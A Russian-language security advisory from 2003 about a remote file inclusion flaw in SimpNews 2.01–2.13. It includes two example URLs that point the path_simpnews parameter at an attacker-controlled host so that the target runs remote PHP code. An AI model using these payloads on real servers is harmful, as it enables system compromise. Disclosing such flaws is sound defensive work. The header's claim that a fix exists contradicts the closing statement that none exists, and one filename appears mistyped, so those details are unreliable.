Security Lab

Выполнение произвольного PHP кода в Simpnews

Дата публикации:23.07.2003
Всего просмотров:1178
Опасность:
Высокая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: SimpNews 2.x
Описание: Уязвимость обнаружена в Simpnews (www.boesch-it.de). Удаленный пользователь может выполнить произвольный PHP код, включая команды операционной системы на целевой системе.

Сценарии 'eventscroller.php' и 'eventcal2.php' включают несколько PHP функций без надлежащей проверки включаемых файлов. Удаленный пользователь может сконструировать специально обработанный URL, чтобы заставить целевой сервер включить произвольные PHP файлы на удаленном сервере и затем выполнить их.

Пример:

http://[target]/eventcal2.php.php?path_simpnews=http://[attacker]/

Это URL включит файлы 'config.php', 'functions.php', or 'includes/has_entries.inc' на сайте '[attacker]' и выполнит их на целевом сервере.

http://[target]/eventscroller.php?path_simpnews=http://[attacker]/

Этот URL включит файлы 'config.php' и 'functions.php' на сайте '[attacker]' и выполнит их на целевом сервере.

Уязвимость обнаружена в Simpnews 2.01-2.13

Способов устранения обнаруженной уязвимости не существует в настоящее время.